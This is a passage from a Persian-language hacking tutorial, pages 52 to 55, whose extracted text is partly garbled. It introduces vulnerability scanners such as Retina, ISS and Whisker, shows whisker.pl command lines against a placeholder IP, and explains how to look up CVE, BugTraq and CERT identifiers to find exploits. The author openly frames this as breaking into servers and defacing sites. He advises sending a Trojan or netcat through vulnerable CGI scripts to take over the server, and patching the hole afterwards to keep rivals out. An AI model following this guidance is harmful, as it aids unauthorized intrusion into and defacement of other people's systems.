ﺕﻮﺱﻂ ﺷﺮﮐﺖ ‪ SUN‬ﻋﺮﺽﻪ ﺷﺪﻩ اﺱﺖ اﻧﺠﺎم ﻣﻴﺪهﺪ‪.‬‬ ‫ایﻦ ‪ Script‬هﺎ ﺁزﻣﻮﻧﻬﺎیﯽ در ﺏﺎرﻩ اﺷﮑﺎﻻت ﭘﺮوﺕﮑﻞ ﭘﺴﺖ اﻟﮑﺘﺮوﻧﻴﮑﯽ‬ ‫اﻧﺠﺎم ﻣﻴﺪهﺪ‪.‬‬ ‫ایﻦ ‪ Script‬هﺎ ﺁزﻣﻮﻧﻬﺎیﯽ را درﺏﺎرﻩ ﺕﺸﺨﻴﺺ ﻣﺸﮑﻼت و ﻧﻘﺎط ﻗﺎﺏﻞ‬ ‫ﻧﻔﻮذ ﻣﻮﺟﻮد در راﺏﻄﻪ ﺏﺎ ﺡﺴﺎب ﮐﺎرﺏﺮان یﺎ ﮔﺮوﻩ هﺎی ﺕﻌﺮیﻒ ﺷﺪﻩ در‬ ‫ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ ویﻨﺪوز اﻧﺠﺎم ﻣﻴﺪهﺪ‪.‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٥٢‬‬

‫ﺏﻌﺪ از اﻧﺘﺨﺎب ‪ Script‬هﺎی ﻣﻮرد ﻋﻼﻗﻪ ﺧﻮد ﺏﻪ ﺏﺮﮔ ﻪ ‪ Prefs‬ﻣﻴﺮوی ﺪ ﮐ ﻪ ﮔﺰیﻨ ﻪ ه ﺎ ﺁﻧﺠ ﺎ را ﻣ ﺸﺎﺏﻪ ﺏﺮﻧﺎﻣ ﻪ ه ﺎی ﺏ ﺎﻻ اﺱ ﺖ ﺏ ﻪ ﺧ ﺼﻮص ‪Nmap‬‬ ‫اﺱﺖ ‪ .‬ﻓﻘﻂ یﮏ ﮔﺰیﻨﻪ ﻣﯽ ﻣﺎﻧﺪ ﮐﻪ در ﺏﺮﮔﻪ ‪ Scan Option‬اﺱﺖ ﺏﺎ ﻧﺎم ‪ Scan for LaBrea tarpitted hosts‬ﮐﻪ ﺡﺘﻤﺎ ﺁن را ﻓﻌﺎل ﮐﻨﻴﺪ‪ .‬ای ﻦ‬ ‫ﮔﺰیﻨﻪ ﻣﮑﺎﻧﻴﺰﻣﯽ را ﮐﻪ دیﮕﺮ ﺡﻮﺻﻠﻪ ﺕﻮﺽﻴﺢ ﺁن را ﻧﺪارم ﻓﻌﺎل ﻣﻴﮑﻨﺪ ﮐﻪ ﻋﻠﻴﻪ ﺏﺮﻧﺎﻣﻪ دﻓﺎﻋﯽ ‪ LaBrea‬ﺏﻪ ﮐﺎر ﻣﻴﺒ ﺮد ﮐ ﻪ ﺏ ﺴﻴﺎر ﺧ ﻮب اﺱ ﺖ‪ .‬ای ﻦ‬ ‫ﺏﺮﻧﺎﻣﻪ ‪ LaBrea‬یﮏ ﺏﺮﻧﺎﻣﻪ دﻓﺎﻋﯽ ﻋﺎﻟﯽ و اﻟﺒﺘﻪ ارزان اﺱﺖ ﮐﻪ ﻣﻌﻤﻮﻻ اﮐﺜﺮ ﻣﺎﺷﻴﻨﻬﺎی روی ﺷﺒﮑﻪ دارﻧﺪ‪.‬‬ ‫در ﺏﺮﮔﻪ ‪ Target Selection‬ﺷﻤﺎ ‪ IP‬ه ﺪف را وارد ﻣﻴﮑﻨﻴ ﺪ و ﺏﻌ ﺪ دﮐﻤ ﻪ ‪Start the scan‬را ﻓ ﺸﺎر ﻣﻴﺪهﻴ ﺪ ﺧ ﻮب ﺏﺮﻧﺎﻣ ﻪ ﺏﻌ ﺪ از ﻣ ﺪﺕﯽ ﺏ ﻪ ﺷ ﻤﺎ‬ ‫ﺟﻮاب ﻣﻴﺪهﺪ ﮐﻪ ﻣﻴﺘﻮاﻧﺪ در ﻓﺮﻣﺖ ‪ HTML‬و ‪ TXT‬ﺏﺎﺷﺪ ﮐﻨﺎر هﺮ ﺡﻔﺮﻩ ای ﮐﻪ ﮐﺸﻒ ﮐﺮدﻩ یﮏ ﺱﺮی ﺷﻤﺎرﻩ اﺱﺖ و‪ ...‬ﮐﻪ در ﻣﻮرد ﮐﺎرایﯽ ه ﺮ‬ ‫ﮐﺪام ﺏﻌﺪا ﮐﺎﻣﻞ ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ ‪.‬‬ ‫ﺏﺮﻧﺎﻣﻪ ‪: Retina‬‬ ‫ﺧﻮب اﺏﺰار ﺏﻌﺪی ﮐﻪ ﻣﻌﺮﻓﯽ ﻣﻴﮑﻨﻢ ﺏﺮﻧﺎﻣﻪ ‪ Retina‬اﺱﺖ ﮐﻪ ﻓﮑﺮ ﻣﻴﮑﻨﻢ ﺁﺧﺮیﻦ ﻧﺴﺨﻪ ﺁن ‪ ۵٫٢‬ﺏﺎﺷﺪ ایﻦ ﺷﮑﻞ ﻧﺴﺨﻪ ‪ ۴٫٩٫٨‬اﺱﺖ ﮐﻪ ایﻦ ﺷﮑﻠﯽ ‪:‬‬

‫ﮐﺎر ﺏﺎ ایﻦ ﺏﺮﻧﺎﻣﻪ ﺱﺎدﻩ اﺱﺖ و اﻟﺒﺘﻪ ﭘﻴﮏ ﺏﻨﺪی ﺁﺱﺎﻧﯽ ﻧﻴﺰ دارد ﺏﺮای ایﻦ ﻣﻨﻈﻮر ﺏﻪ ﻣﻨﻮی ﮐﺮﮐﺮﻩ ای ‪ Tools‬رﻓﺘ ﻪ و ﮔﺰیﻨ ﻪ ‪ Options‬را اﻧﺘﺨ ﺎب‬ ‫ﮐﻨﻴﺪ ﺕﺎ ﮐﺎدری را ﮐﻪ در ﺷﮑﻞ ﺏﺎﻻ ﻣﺸﺎهﺪﻩ ﻣﻴﮑﻨﻴﺪ ﺏﺒﻴﻨﻴﺪ‪ .‬ﺷﻤﺎ ﻣﻴﺘﻮاﻧﻴﺪ در ایﻦ ﭘﻨﺠﺮﻩ ﺱﺮﻋﺖ ﺏﺮﻧﺎﻣ ﻪ را ﮐ ﻢ زی ﺎد ﮐﻨﻴ ﺪ ﮐ ﻪ ﺏ ﺎ ﻧﺘ ﺎیﺞ راﺏﻄ ﻪ ﻣ ﺴﺘﻘﻴﻤﯽ‬ ‫دارد ﺱﺮﻋﺖ زیﺎد ﺟﻮاب ﺧﻮﺏﯽ ﻧﻤﻴﺪهﺪ ﺱﺮﻋﺖ ﮐﻢ هﻢ ﺡﻮﺻﻠﻪ ﺁن را ﺱﺮﻣﯽ ﺏﺮد ﺡﺴﺎﺱﻴﺖ ﺏﺮﻧﺎﻣﻪ و‪ ...‬را ﺕﻨﻈﻴﻢ ﮐﻨﻴﺪ و اﻟﺒﺘﻪ ه ﻢ اﻣﮑ ﺎن اﺕﻮﻣﺎﺱ ﻴﻮن‬ ‫ﻧﻴﺰ ﻣﻮﺟﺪ ﻣﻴﺒﺎﺷﺪ‪ .‬اﻟﺒﺘﻪ ﮔﺰیﻨﻪ هﺎیﯽ هﻢ در ﺏﺎرﻩ ﻧﻮع ﻗﺎﻟﺐ ﭘﺎﺱﺦ و‪ ...‬هﻢ ﻣﻮﺟﺪ اﺱﺖ ﺏﻘﻴﻪ ﮐﺎرا ﺏﺎ ﺧﻮدﺕﺎن ‪.‬‬ ‫ایﻦ ﮐﻪ ﺡﺘﻤﺎ ﻣﻴﺪاﻧﻴﺪ ﺁدرس ‪ Ip‬و یﺎ ﺁدرس ﺱﺎیﺖ را ﺏﺎیﺪ در ﻣﻘﺎﺏﻞ ﮔﺰیﻨﻪ ‪ Address‬ﺏﻨﻮیﺴﻴﺪ !!!‬ ‫ﺏﺮﻧﺎﻣﻪ ‪ ISS‬و یﺎ ﻧﺎم ﮐﺎﻣﻞ ‪: Internet Security System‬‬ ‫ﮐﺎر ﺏﺎ ایﻦ ﺏﺮﻧﺎﻣﻪ ﺱﺎدﻩ اﺱﺖ ﮐﺎرای ﺏﺪی هﻢ ﻧﺪارد ﺱﻴﻤﺎی ﺏﺮﻧﺎﻣﻪ ایﻦ ﺷﮑﻠﯽ اﺱﺖ ﻧﺴﺨﻪ ‪ ۶٫٢‬ﮐﻪ ﻗﺪیﻤﯽ اﺱﺖ ‪:‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٥٣‬‬

‫ﺧﻮب ایﻦ از ﻣﻌﺮﻓﯽ اﺏﺰارهﺎی ﭘﻮیﺶ ﻧﻘﺎط ﺁﺱﻴﺐ ﭘﺬیﺮی ‪ .‬ایﻦ را ﺏﺎیﺪ اول ﻣﻴﮕﻔﺘﻢ ‪ ،‬ایﻦ اﺏﺰار هﺎ هﻤﺎﻧﻄﻮر ﮐﻪ ﻓﻬﻤﻴﺪیﺪ یﮏ ﺱﺮی ﻓﺎیﻞ دارﻧ ﺪ ﮐ ﻪ ﺏ ﺎ‬ ‫ﺕﺴﺖ ﺁﻧﻬﺎ ﻣﯽ ﻓﻬﻤﻨﺪ ﺁیﺎ ایﻦ ﺡﻔﺮﻩ ﻗﺎﺏﻞ اﺱﺘﻔﺎدﻩ اﺱﺖ یﺎ ﻧﻪ یﮏ دﻓﻌﻪ ﺧﺪای ﻧﮑﺮدﻩ ﻓﮑﺮ دیﮕﻪ ایﯽ ﻧﮑﻨﻴﺪ ﮐﻪ ﻣﺜﻼ ایﻨﻬﺎ از ﺧﻮدﺷﻮن ﮐﺸﻒ ﻣﻴﮑﻨﻨ ﺪ ﺡﻔ ﺮﻩ‬ ‫را ﮐﻪ ﺁﺏﺮوی ﻣﺎ و ﺧﻮدﺕﺎن را یﮏ ﺟﺎ ﺏﻪ ﺁب روان و ﭘﺎک ﺏﺴﭙﺎریﺪ‪.‬‬ ‫ﺧﻮب ﺡﺘﻤﺎ ﺏﺎ ایﻦ اﺏﺰار هﺎ ﮐﻪ ﻣﻌﺮﻓﯽ ﮐﺮدم ﺏﻪ ﺷﻤﺎ ‪ ،‬ﺏﻌﺪ از ﻋﻤﻞ ﭘﻮیﺶ یﮏ ﺱﺮی ﺟﻮاب ﻣﻴﺪهﺪ ﮐﻪ ﻣﻌﻤﻮﻻ ﺱﺮویﺲ هﺎی روی ﭘﻮرت هﺎی ﺏ ﺎز و‬ ‫ﺡﻔﺮﻩ هﺎی اﻣﻨﻴﺘﯽ ﻗﺎﺏﻞ اﺱﺘﻔﺎدﻩ در ﻗﺎﻟﺐ درﺟﺎت ﺧﻄﺮﻧﺎک و ﻣﺘﻮﺱﻂ و ﭘﺎیﻴﻦ و یﮏ ﺱﺮی ﺷﻤﺎرﻩ در ﭘﺎیﻴﻦ ﺁﻧﻬﺎ ‪ ،‬ﻣﺎ ﺏﺮای اﺱ ﺘﻔﺎدﻩ از ای ﻦ ﺷ ﻤﺎرﻩ ه ﺎ‬ ‫ﮐﻪ ﻧﺎم ﺁن ﺡﻔﺮﻩ اﺱﺖ از ﻧﻈﺮ ﻣﺘﺨﺼﺼﻴﻦ و ﺱﺎیﺘﻬﺎی اﻣﻨﻴﺘﯽ ) ﺏﺮای ﻃﺒﻘﻪ ﺏﻨﺪی و ‪ ( ...‬ﮐﻪ در ﻗﺎﻟﺒﻬﺎی ﻣﺨﺘﻠﻔﯽ ﻧﻴﺰ هﻢ اﺱﺖ‪ .‬اﻟﺒﺘﻪ ﺷﻤﺎ ﺏﺎ ایﻦ ﺷﻤﺎرﻩ‬ ‫هﺎ ﻣﻄﺎﻟﺒﯽ در ﺏﺎرﻩ ﺁن ﺡﻔﺮﻩ ﻣﯽ ﺁﻣﻮزیﺪ و اﮔﺮ ﺡﻔﺮﻩ ﻗﺎﺏﻞ ﺏﻬﺮﻩ ﺏﺮداری ﻧﻴﺰ ﺏﺎﺷﺪ ﺏﻪ اﺡﺘﻤﺎل زیﺎد ﭼﻨﺪ ﺕﺎ ‪ Exploit‬ﺏﺮای ﺁن ﭘﻴﺪا ﻣﻴﮑﻨﻴﺪ‪.‬‬ ‫اوﻟﻴﻦ ﻗﺎﻟﺐ ‪ CVE‬و ‪: CAN‬‬ ‫ایﻦ ﻗﺎﻟﺐ ﺷﻤﺎرﻩ ﮔﺬاری یﺎ ﻧﺎم ﮔﺬاری ﺡﻔﺮﻩ ه ﺎی اﻣﻨﻴﺘ ﯽ ﮐ ﻪ ﺷ ﺎﻣﻞ ی ﮏ ﻋ ﺪد اﺱ ﺖ ﮐ ﻪ ﺏ ﺎ ﻋﺒ ﺎرت ‪ CVE‬و ی ﺎ ‪ CAN‬ﺷ ﺮوع ﻣﻴ ﺸﻮد ‪ ،‬ﻣﻴﺘﻮاﻧﻴ ﺪ ﺏ ﻪ‬ ‫ﺱﺎیﺖ هﺎی زیﺮ ﻣﺮاﺟﻌﻪ ﮐﺮدﻩ و درﺏﺎرﻩ ﺁﻧﻬﺎ اﻃﻼﻋﺎت ﺏﮕﻴﺮیﺪ ‪:‬‬ ‫‪http://www.iss.net/security_center/advice/Concordance/CVE/default.htm‬‬ ‫‪http://www.securityfocus.com/‬‬ ‫‪http://www.securitytracker.com/‬‬ ‫‪http://www.xfocus.org/‬‬ ‫ﺏﺮای ﻣﺸﺎهﺪﻩ اﻃﻼﻋﺎت در ﺏﺎرﻩ ایﻦ ﻋﺪد ﺏﻪ ﺱﺎیﺘﻬﺎی ﺏﺎﻻ ﻣﺮاﺟﻌﻪ ﮐﺮدﻩ و ﺏﻪ ﻗﺴﻤﺖ ‪ Vulnerability‬ﺱﺎیﺖ رﻓﺘﻪ و ﺏﺎ وارد ﮐﺮدن ﺷﻤﺎرﻩ ‪ CVE‬یﺎ‬ ‫‪ CAN‬ﻣﻄﺎﻟﺒﯽ در ﺏﺎرﻩ ﺁن ﺏﯽ ﺁﻣﻮزیﺪ و اﺡﻴﺎﻧﺎ ‪ Exploit‬هﻢ ﺏﺮای اﺱﺘﻔﺎدﻩ از ﺁن ﺡﻔﺮﻩ اﻣﻨﻴﺘﯽ ﭘﻴﺪا ﮐﻨﻴﺪ‪ .‬و ﺏﺎ ﺕﻮﺟﻪ ﺏ ﻪ ﺁن ‪ Exploit‬ﺡﻤﻠ ﻪ را ﺁﻏ ﺎز‬ ‫ﮐﻨﻴﺪ‪.‬‬ ‫اﮔﺮ ﻣﯽ ﺧﻮاهﻴﺪ ﮐﺎر ﺷﻤﺎ یﮏ ﮐﻤﯽ ﺱﺮ راﺱﺖ ﺕﺮ ﺷﻮد ﻣﻴﺘﻮاﻧﻴﺪ ﺏﻪ ﺁدرس زیﺮ ﺏﺮویﺪ و ﺏﻪ ﺟﺎی ‪ x‬هﺎ ﺷﻤﺎرﻩ را هﻤﺮاﻩ ﻋﺒﺎرت هﻤﺮاﻩ ﺁن ﺏﻨﻮیﺴﻴﺪ‪.‬‬ ‫‪http://cve.mitre.org/cgi-bin/cvename.cgi?name=xxxxxxxxxxxxx‬‬ ‫‪http://cgi.nessus.org/cve.php3?cve=xxxxxxxxxxx‬‬ ‫ﺧﻮب ﺏﻌﺪ از ایﻦ ﮐﺎر ﺷﺎیﺪ دوﺏﺎرﻩ یﮏ ﺱ ﺮی ﺷ ﻤﺎرﻩ ﻣﻌ ﺎدل ﺏ ﺎ ﻓﺮﻣ ﺖ ﻧ ﺎم ﮔ ﺰاری ﻣﺨﺘﻠ ﻒ را ﺏ ﻪ ﺷ ﻤﺎ ﺏﻌ ﻼوﻩ یﮑ ﺴﺮی ﻣﻄﻠ ﺐ در ﺟ ﻮاب ﺏﺪه ﺪ ﮐ ﻪ‬ ‫ﺕﻮﺻﻴﻪ ﻣﻴﮑﻨﻢ هﻢ را ﻣﻄﺎﻟﻌﻪ ﮐﻨﻴﺪ‪.‬‬ ‫ﻗﺎﻟﺐ ‪ BID‬یﺎ ‪: Bug Traq‬‬ ‫ﺏﺮای ﻣﺸﺎهﺪﻩ ﺕﻮﺽﻴﺤﺎت ایﻦ ﻗﺎﻟﺐ ﻣﻴﺘﻮاﻧﻴﺪ از ﺁدرس زیﺮ اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ‬ ‫‪http://www.securityfocus.com/bid/xxxx‬‬ ‫ﮐﻪ ﺏﻪ ﺟﺎی واژﻩ هﺎی ‪ x‬ﺏﺎیﺪ ﻓﻘﻂ ﺷﻤﺎرﻩ را وارد ﮐﻨﻴﺪ‪ .‬هﻤﻴﻦ !!‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٥٤‬‬

‫ﻗﺎﻟﺐ ‪ CA‬یﺎ ‪: CERT‬‬ ‫ایﻦ هﻢ یﮏ ﻧﻮع ﻗﺎﻟﺐ اﺱﺖ ﮐﻪ ﺏﺮای دیﺪن ﺕﻮﺽﻴﺤﺎت ﺁن ﺏﻪ ﺁدرس زیﺮ ﻣﺮاﺟﻌﻪ ﻣﻴﮑﻨﻴﻢ و ﺏﻪ ﺟﺎی ‪ x‬هﺎ ﺕﻤﺎم ﻋﺒﺎرت ﺏﺎ ﭘﻴﺸﻮﻧﺪ ﺁن را ﻣﻴﻨﻮیﺴﻴﻢ ‪:‬‬ ‫‪http://www.cert.org/advisorise/xxxxxxxxxx.html‬‬ ‫ﻗﺎﻟﺐ ‪: XF‬‬ ‫در ایﻦ ﻗﺎﻟﺐ ﻣﯽ ﺕﻮاﻧﻴﺪ ﺕﻮﺽﻴﺤﺎت ﻣﺮﺏﻮﻃﻪ را از ﺁدرس زیﺮ ﺏﺪﺱﺖ ﺁوریﺪ‪.‬‬ ‫‪http://www.iss.net/security_center/search.php‬‬ ‫ﺧﻮب ایﻦ هﻢ از ایﻦ ‪ ،‬ﺏﻪ ﻧﻈﺮ ﻣﻦ ﺏﻬﺘﺮ ایﻦ ﺟﺎ ﺱﺎیﺖ ‪ iss.net‬و ﺱﺎیﺖ ‪ securityfocus.com‬اﺱﺖ ﺏﺮای ﮔﺸﺘﻦ ﺏﻪ دﻧﺒﺎل ﺡﻔﺮﻩ ه ﺎی اﻣﻨﻴﺘ ﯽ ‪ ،‬ﮐ ﻪ‬ ‫ﺷﻤﺎ در ﺱﺎیﺖ ‪ securityfocus.com‬ﻣﻴﺘﻮاﻧﻴﺪ راﻩ ﺡﻞ ﺏﺮ ﻃﺮف ﮐﺮدن ایﻦ ﺡﻔﺮﻩ ) ﺏﺎ ایﻦ ﮐﺎر ﺏﻌﺪ از ﻧﻔﻮذ ﺧﻮد ﺏﺎﻋﺚ ﻣﻴﺸﻮیﺪ ﮐ ﻪ ﺷ ﺨﺺ دیﮕ ﺮی‬ ‫از راﻩ ای ﯽ ﮐ ﻪ ﺷ ﻤﺎ ﺁﻣ ﺪﻩ ای ﺪ وارد ﻧ ﺸﻮد و ﮐ ﺎر ﺷ ﻤﺎ را ﺧ ﺮاب ﻧﮑﻨ ﺪ ﺏ ﺎ ﻧﺎﺷ ﯽ ﺏ ﺎزی اش !! ( و ﮐ ﺪ ﺏﺮﻧﺎﻣ ﻪ ﺏﻬ ﺮﻩ ﺏ ﺮداری از ای ﻦ ﺡﻔ ﺮﻩ و ﻣﻄﺎﻟ ﺐ‬ ‫ﺁﻣﻮزﻧﺪﻩ و ﺷﻤﺎرﻩ و ﻗﺎﻟﺐ ﻣﻌﺪل ﺁن را ﺏﺪﺱﺖ ﺁوریﺪ ‪ ،‬اﻟﺒﺘ ﻪ ﺏﻬﺘ ﺮیﻦ ﮐ ﺎر وارد ﮐ ﺮدن ﻗﺎﻟ ﺐ و ﺷ ﻤﺎرﻩ ﺁن هﻤ ﺮاﻩ ﮐﻠﻴ ﺪ واژﻩ ه ﺎی ﻣ ﻮرد ﻧﻈ ﺮ ﺧ ﻮد در‬ ‫ﺟﺴﺘﺠﻮﮔﺮ ‪ Google‬اﺱﺖ ﮐﻪ ﺏﺮای ﺷﻤﺎ ﻧﺘﺎیﺞ زیﺎدی را ﺏﺪﺱﺖ ﻣﯽ ﺁورد‪.‬‬ ‫ﭘﻮیﺶ ﺏﺮﻧﺎﻣﻪ هﺎی ﮐﺎرﺏﺮدی ﺕﺤﺖ وب ﺏﺮای ﮐﺸﻒ ﺡﻔﺮﻩ هﺎی ﺁﺱﻴﺐ ﭘﺬیﺮ ‪:‬‬ ‫ﺧﻮب در ایﻦ ﺏﺎرﻩ یﮏ ﻣﻄﻠﺐ دیﮕﺮ اﺱﺖ ﮐﻪ ﻓﻘﻂ ﻣﺮﺏﻮط ﺏﻪ ﮐﺸﻒ ﺡﻔﺮﻩ هﺎی ﺏﺮﻧﺎﻣﻪ هﺎی ﺕﺤﺖ وب ﻣﻴ ﺸﻮد ﮐ ﻪ ﺕﻮﺽ ﻴﺢ ﻣﻴ ﺪهﻢ ) ﺏ ﺮای ﮐ ﺴﺎﻧﯽ ﮐ ﻪ‬ ‫ﺧﻮرﻩ ‪ Deific‬ﮐﺮدن ﺻﻔﺤﻪ ﺱﺎیﺖ هﺎ هﺴﺘﻨﺪ دارم ﻣﻴﮕﻮیﻢ !! ( ‪.‬‬ ‫ﻣﺎ در ایﻦ ﮐﺎر اول ﻣﺎﺷﻴﻨﯽ ﮐﻪ وﻇﻴﻔﻪ ﺱﺮویﺲ دهﻨﺪﻩ وب را ﺏ ﺮ ﻋ ﺪﻩ دارد را ﺏ ﺎ روﺷ ﻬﺎی ﮔ ﺎم اول ﮐ ﺸﻒ ﮐ ﺮدﻩ ﺏﻌ ﺪ ی ﮏ راﺱ ﺖ اﮔ ﺮ دل ﺧﻮدﺕ ﺎن‬ ‫ﺧﻮاﺱﺖ ﻣﯽ ﺁیﻴﺪ ﺏﻪ ایﻦ ﻣﺮﺡﻠﻪ اﮔﺮ وﺱﻮاﺱﯽ هﺴﺘﻴﺪ ﮔﺎم دوم را هﻢ اﻧﺠﺎم دهﻴﺪ اﮔﺮ ﻣﻴﺨﻮاهﻴﺪ ‪ %١٠٠‬ﻣﻮﻓﻖ ﺷﻮیﺪ ﮔﺎم ﺱﻮم ه ﻢ را اﻧﺠ ﺎم دهﻴ ﺪ ) ای ﻦ‬ ‫هﻤﻴﻦ ﺟﺎ ﺏﮕﻮیﻢ ﺕﻤﺎم ﺏﺮﻧﺎﻣﻪ هﺎیﯽ ﮐﻪ در ﮔﺎم ﺱﻮم ﻣﻌﺮﻓﯽ ﮐﺮدم ایﻦ ﻧﻮع ﭘﻮیﺶ ﺧﺎص را ﮐﻪ ﺡﺎﻻ دارم ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ اﻧﺠﺎم ﻣﻴﺪهﻨﺪ (‪.‬‬ ‫اﺻﻮل ﮐﺎر در ایﻦ روش ﻓﻘﻂ ﺡﻤﻠﻪ ﺏﻪ ﺏﺮﻧﺎﻣﻪ ﺱﺮویﺲ دهﻨﺪﻩ وب اﺱﺖ ﻣﺜﻞ ‪ IIS‬و ‪ Apache‬و ‪ iPlanet‬و‪...‬‬ ‫ﻣﻌﺮﻓﯽ اﺏﺰار ‪: Whisker‬‬ ‫ﻣﻌﺮوف ﺕﺮیﻦ ﺏﺮﻧﺎﻣﻪ ﺏﺮای ایﻦ ﮐﺎر ‪ Whisker‬اﺱﺖ ﮐﻪ ﺏﺮای ﺧﺎﻧﻮادﻩ ‪ Unix‬اﺱﺖ ﻧﻪ ﺏﺒﺨﺸﻴﺪ ﺏ ﺎ ی ﮏ ﻣﻔ ﺴﺮ ‪ Perl‬ﺏ ﺮای ویﻨ ﺪوز ه ﻢ ﻗﺎﺏ ﻞ اﺱ ﺘﻔﺎدﻩ‬ ‫ﻣﻴﺸﻮد‪ .‬ﺏﺮای اﺱﺘﻔﺎدﻩ از ایﻦ دﺱﺘﻮر در ﺧﻂ ﻓﺮﻣﺎن ﻣﺤﻴﻂ ﻟﻴﻨﻮﮐﺲ هﺎ یﺎ هﻤﺎن ‪ Shell‬اﺻﻄﻼﺡﺎ دﺱﺘﻮر زیﺮ را ﻣﯽ ﻧﻮیﺴﻴﻢ ‪:‬‬ ‫‪$ whisker.pl –h xxx.xxx.xxx.xxx –vv –W | tee‬‬ ‫ﺧﻮب ایﻦ اول ﺏﺎیﺪ ﻣﻴﮕﻔﺘﻢ ﮐﻪ اﻻن ﻣﻴﮕﻢ ﺏﺒﺨﺸﻴﺪ !! ﺱﻮیﭻ هﺎی ﻣﺘﺪاول ایﻦ ﺏﺮﻧﺎﻣﻪ‪:‬‬ ‫هﻨﮕﺎﻣﯽ ﮐﻪ ﺏﺨﻮاهﻴﻢ از ﻧﺎم ﻣﻴﺰﺏﺎن یﺎ ﺷﻤﺎرﻩ ‪ IP‬ﺁن اﺱﺘﻔﺎدﻩ ﮐﻨﻴﻢ از ﺱﻮیﭻ ‪ –h‬ﺡﺘﻤﺎ اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻴﻢ !!‬ ‫اﮔﺮ ﺏﺨﻮاهﻴﻢ ﻟﻴﺴﺘﯽ از ﻣﻴﺰﺏﺎن هﺎ و یﺎ ﺷﻤﺎرﻩ ‪ IP‬را ﺏﻪ ﺏﺮﻧﺎﻣﻪ ﺏﺪهﻴﻢ از ﺱﻮیﭻ ‪ –H‬اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻴﻢ ‪.‬‬ ‫ﺱﻮیﭻ ‪ –vv‬ﺏﺎﻋﺚ ﺙﺒﺖ ﻧﺘﺎیﺞ ﭘﻮیﺶ ﺡﻔﺮﻩ هﺎ ﻣﻴﺸﻮد‪.‬‬ ‫ﺱﻮیﭻ ‪ –W‬ﺏﺎﻋﺚ ﻣﻴﺸﻮد ﻧﺘﺎیﺞ در ﻗﺎﻟﺐ ‪ HTML‬ذﺧﻴﺮﻩ ﺷﻮد ‪.‬‬ ‫ﺱﻮیﭻ ‪ –l‬ﺏﺎﻋﺚ ﻣﻴﺸﻮد ﮐﻪ هﻤﻴﺸﻪ ﻧﺘﺎیﺞ در ﻓﺎیﻠﯽ ﮐﻪ ﻣﻌﺮﻓﯽ ﻣﻴﮑﻨﻴﺪ ﺙﺒﺖ ﺷﻮد‪ ) .‬ﺕﻮﺻﻴﻪ ﻣﻦ ﺏﻪ ﺷﻤﺎ ‪ :‬ﺏﻪ ﻧﺪرت اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ !!(‬ ‫ﺱﻮیﭻ ‪ –x‬ﺏﺎﻋﺚ اﺱﺘﻔﺎدﻩ از ‪ SSL‬ﻣﻴﺸﻮد‪) .‬ﺏﺮای وب ﺱﺎیﺖ هﺎیﯽ ﮐﻪ از ‪ SSL‬اﺱﺘﻔﺎدﻩ ﻣﯽ ﮐﻨﻨﺪ ( ) ایﻦ ﺱﻮیﭻ را ﺏﺎیﺪ ﻗﺒﻞ از ﺱﻮیﭻ ‪ –h‬ﺏﮕﺰاریﺪ(‬ ‫ﺧﻮب هﻤﻴﻦ هﺎ اﺱﺖ ﺷﻤﺎ ﺏﺎیﺪ دﻧﺒﺎل ﺁن ﺟﻮاب هﺎیﯽ ﺏﮕﺮدیﺪ ﮐﻪ ‪ 200 OK‬ﺟﻠﻮی ﺁﻧﻬﺎ اﺱﺖ و ﺕﺮﺟﻴﺤﺎ در ﺷﺎﺧﻪ ‪ Script‬هﺴﺘﻨﺪ و ﺏﺎ اﺱﺘﻔﺎدﻩ از ﮐ ﺪی‬ ‫ﮐﻪ ﺟﻠﻮی ﺁن اﺱﺖ ﺏﺎ ارﺱﺎل یﮏ اﺱﺐ ﺕﺮﺁوا و یﺎ ‪ NC‬و‪ ...‬ﺏﭙﺮدازیﺪ و ﺱﺮویﺲ دهﻨﺪﻩ را ﮐﻨﺘﺮل ﺁن را ﺏﺪﺱﺖ ﺏﮕﻴﺮیﺪ‪.‬‬ ‫ﻓﻘﻂ ایﻦ ﺏﮕﻢ ﮐﻪ ﺁﻧﻬﺎیﯽ ﮐﻪ ﻟﻴﻨﻮﮐﺲ ﮐﺎر هﺴﺘﻨﺪ ﺡﺘﻤﺎ ﻣﻴﺪاﻧﻨﺪ ﮐﻪ ﺕﺎﺏﻊ ‪ Tee‬ﮐﺎرش ایﻦ هﺴﺖ ﮐﻪ ﺧﺮوﺟﯽ را از ﺏﺮﻧﺎﻣﻪ در ﺡﺎل اﺟ ﺮا ﻟﺤﻈ ﻪ ﺏ ﻪ ﻟﺤﻈ ﻪ‬ ‫ﻣﻴﮕﻴﺮد و ﺏﻪ ﻣﺎ ﻧﻤﺎیﺶ ﻣﻴﺪهﺪ و اﻟﺒﺘﻪ ذﺧﻴﺮﻩ هﻢ ﻣﻴﮑﻨﺪ‪.‬‬ ‫ﺧﻮب ﺏﺎ ﻓﺮﻣﺎن زیﺮ ﻣﻴﺸﻮد ﻧﻮع وب ﺱﺮور را ﺕﺸﺨﻴﺺ داد ﺏﺎ ایﻦ ﺏﺮﻧﺎﻣﻪ ‪:‬‬ ‫"‪$ whisker.pl –h xxx.xxx.xxx.xxx –vv –W –s "IIS/5.0‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٥٥‬‬

